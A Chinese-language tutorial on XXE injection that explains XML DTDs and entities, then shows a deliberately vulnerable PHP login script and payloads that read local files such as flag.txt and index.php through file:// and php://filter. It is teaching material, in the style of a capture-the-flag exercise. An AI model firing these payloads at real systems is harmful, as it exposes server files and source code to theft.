XXE簡介

XXE：全稱XML External Entity Injection，即XML外部實體注入漏洞

知識點

1、XML
2、DTD，這個是最重要的
簡介：
（1）內(nèi)部的 DOCTYPE 聲明

假如 DTD 被包含在您的 XML 源文件中，它應(yīng)當(dāng)通過下面的語法包裝在一個 DOCTYPE 聲明中： <!DOCTYPE 根元素 [元素聲明]> 例如： <!DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)> ]> <note><to>George</to><from>John</from><heading>Reminder</heading><body>Don't forget the meeting!</body> </note> 以上 DTD 解釋如下： !DOCTYPE note (第二行)定義此文檔是 note 類型的文檔。 !ELEMENT note (第三行)定義 note 元素有四個元素："to、from、heading,、body" !ELEMENT to (第四行)定義 to 元素為 "#PCDATA" 類型 !ELEMENT from (第五行)定義 from 元素為 "#PCDATA" 類型 !ELEMENT heading (第六行)定義 heading 元素為 "#PCDATA" 類型 !ELEMENT body (第七行)定義 body 元素為 "#PCDATA" 類型

（2）外部文檔聲明

假如 DTD 位于 XML 源文件的外部，那么它應(yīng)通過下面的語法被封裝在一個 DOCTYPE 定義中： <!DOCTYPE 根元素 SYSTEM "文件名"><?xml version="1.0"?> <!DOCTYPE note SYSTEM "note.dtd"> <note> <to>George</to> <from>John</from> <heading>Reminder</heading> <body>Don't forget the meeting!</body> </note> 這是包含 DTD 的 "note.dtd" 文件： <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)>下面的實體在 XML 中被預(yù)定義： 實體引用 字符 &lt; < &gt; > &amp; & &quot; " &apos; '在 DTD 中，XML 元素通過元素聲明來進行聲明。元素聲明使用下面的語法： <!ELEMENT 元素名稱 類別> 或者 <!ELEMENT 元素名稱 (元素內(nèi)容)>

（3）XXE利用重點：實體
(3)-1：簡介
實體是用于定義引用普通文本或特殊字符的快捷方式的變量。
實體引用是對實體的引用。
實體可在內(nèi)部或外部進行聲明。

(3)-2：一個內(nèi)部實體聲明

語法： <!ENTITY 實體名稱 "實體的值">例子： DTD 例子: <!ENTITY writer "Bill Gates"> <!ENTITY copyright "Copyright W3School.com.cn">XML 例子: <author>&writer;&copyright;</author>注釋: 一個實體由三部分構(gòu)成: 一個和號 (&), 一個實體名稱, 以及一個分號 (;)。

(3)-3：一個外部實體聲明

語法： <!ENTITY 實體名稱 SYSTEM "URI/URL">例子： DTD 例子: <!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd"> <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">XML 例子: <author>&writer;&copyright;</author>

(3)-4：補充
帶有任何內(nèi)容的元素
通過類別關(guān)鍵詞 ANY 聲明的元素，可包含任何可解析數(shù)據(jù)的組合：

<!ELEMENT 元素名稱 ANY> 例子： <!ELEMENT note ANY>理解下面的代碼含義：這是POST提交的 上面是一個XXE攻擊的Payload <?xml version="1.0" encoding="utf-8"?>//xml格式必備 <!DOCTYPE root [ (注):內(nèi)部的DOCTYPE聲明，聲明一個root根元素 <!ELEMENT root ANY > (注):定義root根元素的子元素可以是任何組合 <!ENTITY xxx SYSTEM "php://filter/read=convert.base64-encode/resource=flag.txt" > (注):聲明一個xml代碼外的外部實體名叫xxx，SYSTEM后面的是它的值]> (注):閉合<root> (注):XML代碼的根元素，也就是上面DTD中的root根元素，這個必須一樣，因為上面的DTD就是檢查下面的XML代碼的<user>&xxx;</user> (注):XML代碼的子元素user，&xxx，表示在XML代碼內(nèi)部執(zhí)行外部DTD的實體函數(shù)xxx<pass>mypass</pass> (注):XML代碼的子元素pass </root> (注):閉合根元素

外部實體注入舉例

有回顯讀取本地文件
漏洞代碼：

<?php libxml_disable_entity_loader (false); show_source(__FILE__); $xmlfile = file_get_contents('php://input'); echo '<br>'; if(strlen($xmlfile)>0){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds = simplexml_import_dom($dom);$user = $creds->user;$pass = $creds->pass;echo "You have logged in as user $user"; } ?>

payload：

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ //foo名稱隨意<!ENTITY xxe SYSTEM "file:///F:/flag.txt" > //xxe名稱隨意]> <root> //xml根元素名稱隨意，但必須要有（在當(dāng)前漏洞源碼環(huán)境下） <user>&xxe;</user> //xxe名稱和上面的名稱對應(yīng)，在這里xml中的子元素user和漏洞源碼中的對應(yīng)，不可修改為其它 </root>

有些文件中有<、>等實體，若直接用file讀取會導(dǎo)致解析錯誤，此時可以利用php://filter將內(nèi)容轉(zhuǎn)換為base64后再讀取

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> <root><user>&file;</user> </root>

特別注意：

實體名稱命名不能以數(shù)字開頭，例如上面的xxx 使用bp時，需要添加Content-Type: application/xml payload中xml的根元素 xml形式的數(shù)據(jù)傳輸e.g:<user>admin</user>

淺顯地了解了xxe，后續(xù)再深入研究。

總結(jié)

以上是生活随笔為你收集整理的XXE（1）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。